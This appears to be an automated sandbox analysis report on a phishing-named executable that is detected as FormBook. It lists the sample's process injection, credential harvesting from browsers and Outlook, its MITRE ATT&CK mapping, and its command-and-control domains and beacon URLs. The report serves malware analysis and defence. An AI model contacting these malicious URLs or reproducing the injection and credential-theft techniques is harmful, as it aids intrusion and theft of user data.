            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018E8BF0 mov eax, dword ptr fs:[00000030h]3_2_018E8BF0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018E8BF0 mov eax, dword ptr fs:[00000030h]3_2_018E8BF0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018E8BF0 mov eax, dword ptr fs:[00000030h]3_2_018E8BF0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0195EB1D mov eax, dword ptr fs:[00000030h]3_2_0195EB1D
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0195EB1D mov eax, dword ptr fs:[00000030h]3_2_0195EB1D
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0195EB1D mov eax, dword ptr fs:[00000030h]3_2_0195EB1D
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0195EB1D mov eax, dword ptr fs:[00000030h]3_2_0195EB1D
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0195EB1D mov eax, dword ptr fs:[00000030h]3_2_0195EB1D
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0195EB1D mov eax, dword ptr fs:[00000030h]3_2_0195EB1D
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0195EB1D mov eax, dword ptr fs:[00000030h]3_2_0195EB1D
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0195EB1D mov eax, dword ptr fs:[00000030h]3_2_0195EB1D
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0195EB1D mov eax, dword ptr fs:[00000030h]3_2_0195EB1D
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0190EB20 mov eax, dword ptr fs:[00000030h]3_2_0190EB20
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0190EB20 mov eax, dword ptr fs:[00000030h]3_2_0190EB20
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_019A8B28 mov eax, dword ptr fs:[00000030h]3_2_019A8B28
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_019A8B28 mov eax, dword ptr fs:[00000030h]3_2_019A8B28
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0198EB50 mov eax, dword ptr fs:[00000030h]3_2_0198EB50
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01994B4B mov eax, dword ptr fs:[00000030h]3_2_01994B4B
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01994B4B mov eax, dword ptr fs:[00000030h]3_2_01994B4B
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01976B40 mov eax, dword ptr fs:[00000030h]3_2_01976B40
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01976B40 mov eax, dword ptr fs:[00000030h]3_2_01976B40
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01988B42 mov eax, dword ptr fs:[00000030h]3_2_01988B42
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018DCB7E mov eax, dword ptr fs:[00000030h]3_2_018DCB7E
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01918A90 mov edx, dword ptr fs:[00000030h]3_2_01918A90
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018EEA80 mov eax, dword ptr fs:[00000030h]3_2_018EEA80
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018EEA80 mov eax, dword ptr fs:[00000030h]3_2_018EEA80
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018EEA80 mov eax, dword ptr fs:[00000030h]3_2_018EEA80
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018EEA80 mov eax, dword ptr fs:[00000030h]3_2_018EEA80
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018EEA80 mov eax, dword ptr fs:[00000030h]3_2_018EEA80
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018EEA80 mov eax, dword ptr fs:[00000030h]3_2_018EEA80
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018EEA80 mov eax, dword ptr fs:[00000030h]3_2_018EEA80
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018EEA80 mov eax, dword ptr fs:[00000030h]3_2_018EEA80
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018EEA80 mov eax, dword ptr fs:[00000030h]3_2_018EEA80
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_019B4A80 mov eax, dword ptr fs:[00000030h]3_2_019B4A80
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018E8AA0 mov eax, dword ptr fs:[00000030h]3_2_018E8AA0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018E8AA0 mov eax, dword ptr fs:[00000030h]3_2_018E8AA0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01936AA4 mov eax, dword ptr fs:[00000030h]3_2_01936AA4
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01914AD0 mov eax, dword ptr fs:[00000030h]3_2_01914AD0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01914AD0 mov eax, dword ptr fs:[00000030h]3_2_01914AD0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018E0AD0 mov eax, dword ptr fs:[00000030h]3_2_018E0AD0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01936ACC mov eax, dword ptr fs:[00000030h]3_2_01936ACC
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01936ACC mov eax, dword ptr fs:[00000030h]3_2_01936ACC
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01936ACC mov eax, dword ptr fs:[00000030h]3_2_01936ACC
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0191AAEE mov eax, dword ptr fs:[00000030h]3_2_0191AAEE
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0191AAEE mov eax, dword ptr fs:[00000030h]3_2_0191AAEE
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0196CA11 mov eax, dword ptr fs:[00000030h]3_2_0196CA11
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01904A35 mov eax, dword ptr fs:[00000030h]3_2_01904A35
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01904A35 mov eax, dword ptr fs:[00000030h]3_2_01904A35
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0191CA38 mov eax, dword ptr fs:[00000030h]3_2_0191CA38
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0191CA24 mov eax, dword ptr fs:[00000030h]3_2_0191CA24
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0190EA2E mov eax, dword ptr fs:[00000030h]3_2_0190EA2E
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018F0A5B mov eax, dword ptr fs:[00000030h]3_2_018F0A5B
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018F0A5B mov eax, dword ptr fs:[00000030h]3_2_018F0A5B
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018E6A50 mov eax, dword ptr fs:[00000030h]3_2_018E6A50
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018E6A50 mov eax, dword ptr fs:[00000030h]3_2_018E6A50
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018E6A50 mov eax, dword ptr fs:[00000030h]3_2_018E6A50
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018E6A50 mov eax, dword ptr fs:[00000030h]3_2_018E6A50
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018E6A50 mov eax, dword ptr fs:[00000030h]3_2_018E6A50
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018E6A50 mov eax, dword ptr fs:[00000030h]3_2_018E6A50
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018E6A50 mov eax, dword ptr fs:[00000030h]3_2_018E6A50
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0195CA72 mov eax, dword ptr fs:[00000030h]3_2_0195CA72
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0195CA72 mov eax, dword ptr fs:[00000030h]3_2_0195CA72
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0198EA60 mov eax, dword ptr fs:[00000030h]3_2_0198EA60
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0191CA6F mov eax, dword ptr fs:[00000030h]3_2_0191CA6F
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0191CA6F mov eax, dword ptr fs:[00000030h]3_2_0191CA6F
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0191CA6F mov eax, dword ptr fs:[00000030h]3_2_0191CA6F
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0191CDB1 mov ecx, dword ptr fs:[00000030h]3_2_0191CDB1
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0191CDB1 mov eax, dword ptr fs:[00000030h]3_2_0191CDB1
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0191CDB1 mov eax, dword ptr fs:[00000030h]3_2_0191CDB1
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01908DBF mov eax, dword ptr fs:[00000030h]3_2_01908DBF
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01908DBF mov eax, dword ptr fs:[00000030h]3_2_01908DBF
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01916DA0 mov eax, dword ptr fs:[00000030h]3_2_01916DA0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_019A8DAE mov eax, dword ptr fs:[00000030h]3_2_019A8DAE
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_019A8DAE mov eax, dword ptr fs:[00000030h]3_2_019A8DAE
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_019B4DAD mov eax, dword ptr fs:[00000030h]3_2_019B4DAD
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01964DD7 mov eax, dword ptr fs:[00000030h]3_2_01964DD7
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_004173F3 LdrLoadDll,3_2_004173F3
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeSection loaded: unknown target: C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeSection loaded: unknown target: C:\Windows\SysWOW64\isoburn.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: unknown target: C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: unknown target: C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: unknown target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: unknown target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Writes to foreign memory regions
            Source: C:\Windows\SysWOW64\isoburn.exeMemory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF613480000Jump to behavior
            Injects a PE file into a foreign processes
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeMemory written: C:\Users\user\Desktop\PO_YTWHDF3432.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeMemory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF613480000 value starts with: 4D5AJump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\isoburn.exeThread APC queued: target process: C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exeJump to behavior
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeProcess created: C:\Users\user\Desktop\PO_YTWHDF3432.exe C:\Users\user\Desktop\PO_YTWHDF3432.exeJump to behavior
            Source: C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exeProcess created: C:\Windows\SysWOW64\isoburn.exe C:\Windows\SysWOW64\isoburn.exeJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exeJump to behavior
            Source: qNENczArVjafOgvC.exe, 0000000A.00000002.3731310357.0000000000CD1000.00000002.00000001.00040000.00000000.sdmp, qNENczArVjafOgvC.exe, 0000000A.00000000.1296814480.0000000000CD0000.00000002.00000001.00040000.00000000.sdmp, qNENczArVjafOgvC.exe, 0000000D.00000002.3732050038.0000000001831000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: qNENczArVjafOgvC.exe, 0000000A.00000002.3731310357.0000000000CD1000.00000002.00000001.00040000.00000000.sdmp, qNENczArVjafOgvC.exe, 0000000A.00000000.1296814480.0000000000CD0000.00000002.00000001.00040000.00000000.sdmp, qNENczArVjafOgvC.exe, 0000000D.00000002.3732050038.0000000001831000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: qNENczArVjafOgvC.exe, 0000000A.00000002.3731310357.0000000000CD1000.00000002.00000001.00040000.00000000.sdmp, qNENczArVjafOgvC.exe, 0000000A.00000000.1296814480.0000000000CD0000.00000002.00000001.00040000.00000000.sdmp, qNENczArVjafOgvC.exe, 0000000D.00000002.3732050038.0000000001831000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: EProgram Manager
            Source: qNENczArVjafOgvC.exe, 0000000A.00000002.3731310357.0000000000CD1000.00000002.00000001.00040000.00000000.sdmp, qNENczArVjafOgvC.exe, 0000000A.00000000.1296814480.0000000000CD0000.00000002.00000001.00040000.00000000.sdmp, qNENczArVjafOgvC.exe, 0000000D.00000002.3732050038.0000000001831000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeQueries volume information: C:\Users\user\Desktop\PO_YTWHDF3432.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 3.2.PO_YTWHDF3432.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.PO_YTWHDF3432.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000003.00000002.1371406430.0000000001C40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3725149272.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3732735204.0000000003700000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3732837802.0000000004F00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.1370308001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.3732252302.0000000002C80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.1371528010.0000000001E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.3732619108.0000000002390000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\isoburn.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\isoburn.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 3.2.PO_YTWHDF3432.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.PO_YTWHDF3432.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000003.00000002.1371406430.0000000001C40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3725149272.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3732735204.0000000003700000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3732837802.0000000004F00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.1370308001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.3732252302.0000000002C80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.1371528010.0000000001E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.3732619108.0000000002390000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpactResource DevelopmentReconnaissance
            Valid AccountsWindows Management InstrumentationPath Interception412
            Process Injection            		1
            Masquerading            		1
            OS Credential Dumping            		21
            Security Software Discovery            		Remote Services1
            Email Collection            		Exfiltration Over Other Network Medium1
            Encrypted Channel            		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationAbuse Accessibility FeaturesAcquire InfrastructureGather Victim Identity Information
            Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
            Disable or Modify Tools            		LSASS Memory2
            Process Discovery            		Remote Desktop Protocol1
            Archive Collected Data            		Exfiltration Over Bluetooth3
            Ingress Tool Transfer            		SIM Card SwapObtain Device Cloud BackupsNetwork Denial of ServiceDomainsCredentials
            Domain AccountsAtLogon Script (Windows)Logon Script (Windows)31
            Virtualization/Sandbox Evasion            		Security Account Manager31
            Virtualization/Sandbox Evasion            		SMB/Windows Admin Shares1
            Data from Local System            		Automated Exfiltration4
            Non-Application Layer Protocol            		Data Encrypted for ImpactDNS ServerEmail Addresses
            Local AccountsCronLogin HookLogin Hook412
            Process Injection            		NTDS1
            Application Window Discovery            		Distributed Component Object ModelInput CaptureTraffic Duplication4
            Application Layer Protocol            		Data DestructionVirtual Private ServerEmployee Names
            Cloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Deobfuscate/Decode Files or Information            		LSA Secrets1
            File and Directory Discovery            		SSHKeyloggingScheduled TransferFallback ChannelsData Encrypted for ImpactServerGather Victim Network Information
            Replication Through Removable MediaScheduled TaskRC ScriptsRC Scripts4
            Obfuscated Files or Information            		Cached Domain Credentials13
            System Information Discovery            		VNCGUI Input CaptureData Transfer Size LimitsMultiband CommunicationService StopBotnetDomain Properties
            External Remote ServicesSystemd TimersStartup ItemsStartup Items12
            Software Packing            		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureExfiltration Over C2 ChannelCommonly Used PortInhibit System RecoveryWeb ServicesDNS
            Drive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            Timestomp            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingExfiltration Over Alternative ProtocolApplication Layer ProtocolDefacementServerlessNetwork Trust Dependencies

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            PO_YTWHDF3432.exe62%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
            PO_YTWHDF3432.exe81%VirustotalBrowse
            PO_YTWHDF3432.exe100%AviraHEUR/AGEN.1305452
            PO_YTWHDF3432.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            www.makeinai.online3%VirustotalBrowse
            www.nesmalt.info2%VirustotalBrowse
            www.611erhm.top12%VirustotalBrowse
            fam-scharf.net9%VirustotalBrowse
            instantconvey.com6%VirustotalBrowse
            altralogos.com17%VirustotalBrowse
            wrautomotive.online8%VirustotalBrowse
            alldaysslimmingstea.com13%VirustotalBrowse
            www.poria.link0%VirustotalBrowse
            www.jones4deepriver.com0%VirustotalBrowse
            www.domainappraisalbot.com1%VirustotalBrowse
            www.magmadokum.com1%VirustotalBrowse
            natroredirect.natrocdn.com2%VirustotalBrowse
            thecoloringbitch.com13%VirustotalBrowse
            www.altralogos.com12%VirustotalBrowse
            www.77moea.top10%VirustotalBrowse
            www.wrautomotive.online1%VirustotalBrowse
            www.thecoloringbitch.com8%VirustotalBrowse
            www.alldaysslimmingstea.com0%VirustotalBrowse
            www.fam-scharf.net1%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            http://www.makeinai.online/ahec/?Ot=MydpLo7WWyKQN3KSEM/46nakICary48nbscI2lMT8W/M5j1pmQABg8QwQndiOgkeUarM8fNOhSJ3XzKDSkOhi0CLYcLsXbR3hQ==&6d=QlZl100%Avira URL Cloudmalware
            https://mozilla.org0/0%URL Reputationsafe
            http://www.magmadokum.com/ahec/?Ot=AHFK2pjoxw5zzLKjgIeieoxyeFKGBXiFIXzrT8sRZEqLGYv6y8nhVjDsidhHFHxwb+HDFiGiPRNZnrHWQBMiJvor1pzBMUzxhg==&6d=QlZl0%Avira URL Cloudsafe
            http://www.611erhm.top/ahec/?Ot=UYUxSke5jkUMcYDKg5c5qeCNAmjygCX5uaIG43dC5thZqMprvLUeD5Feo3aTVHSupyfrGHzleQTbxGW3puedJJnHNv+xYZWaEw==&6d=QlZl100%Avira URL Cloudphishing
            http://www.instantconvey.com/ahec/?Ot=SEtDmKR01RO/v1cj8toEclhnh+z+cFCFQ+LqZaILuKhM8xDFx1nbKCOFshx5Sqoz6Az3phyVzpkjs7F2QS7dClcm7p6TyxSZVg==&6d=QlZl100%Avira URL Cloudmalware
            http://www.jones4deepriver.com/ahec/?Ot=9k2v98v8fW7x5mtxcj8a5QMRCoEP1Px6NgJCH+u8B3tf6gDcFaFwcfLjsp7tbCeN6M+Gl5HR8oN4IorBb0piTBAHvy1fUTc2Bw==&6d=QlZl100%Avira URL Cloudmalware
            http://altralogos.com/ahec/?Ot=3lo42cEGi68x7KhRgTNiezz9KQRWhNcycY0hNiK/Qn4Z100%Avira URL Cloudmalware
            http://www.poria.link/ahec/3%VirustotalBrowse
            http://www.magmadokum.com/ahec/0%Avira URL Cloudsafe
            http://www.domainappraisalbot.com/ahec/?Ot=bB5JTYLqXbmN0Rh+5NINP+PQjDS0UbZCl3xm8ZfdPOYVrj3MpZEcwx/57KsfYAKqEjFN/H+DNeQWefm4mYcz+JoJDCs0w/OhmA==&6d=QlZl100%Avira URL Cloudmalware
            http://www.77moea.top/ahec/100%Avira URL Cloudphishing
            http://www.poria.link/ahec/100%Avira URL Cloudmalware
            http://www.fam-scharf.net/ahec/100%Avira URL Cloudmalware
            http://www.nesmalt.info/ahec/100%Avira URL Cloudmalware
            http://www.makeinai.online/ahec/100%Avira URL Cloudmalware
            http://www.thecoloringbitch.com/ahec/?Ot=nB1qtJANgieev8TNIXcafe3NbPYBnXyCXRyPWsB/WMzSWoyZdSlu5bXncPzzIIBEZ/2nP35zxbYs3CtalsMWA7WUc9X1BQW9lg==&6d=QlZl100%Avira URL Cloudmalware
            http://www.thecoloringbitch.com/ahec/100%Avira URL Cloudmalware
            https://pdds.quark.cn/download/stfile/rrxtuszryrsvrtzte/QuarkCloudDrive-v2.5.43-release-pckk0%Avira URL Cloudsafe
            http://www.poria.link/ahec/?Ot=IVKkGpXtV1toVTOE4YlrK/DLoA9BOULGifHJVqVOgN7K+V/6a9WE/CA4RHgfE4yJ8GdRU2XQNCMfR2HSu9NM5VP3fUQbd2z87Q==&6d=QlZl100%Avira URL Cloudmalware
            http://cdn.jsinit.directfwd.com/sk-jspark_init.php100%Avira URL Cloudmalware
            http://www.77moea.top/ahec/?Ot=W415zxONlMY0LROALmBwVywFRuOF9MDUrzPBSWER7JgIGEVSpL5hn1DTAqCrj0fiYOesE/vl81lAGPaeX7agy8WUnV35Ak22aw==&6d=QlZl100%Avira URL Cloudphishing
            http://www.wrautomotive.online/ahec/0%Avira URL Cloudsafe
            http://www.fam-scharf.net/ahec/?Ot=pHT1kOem2IT0Y9TOyYUVH8n+JKlTpsv3XSVhoxxlik7UiuURsLT/Jzy3sp/tZoydu20sa6TfNH7nZl1KjnhVFUdGE6T0LcUEcA==&6d=QlZl100%Avira URL Cloudmalware
            http://www.wrautomotive.online0%Avira URL Cloudsafe
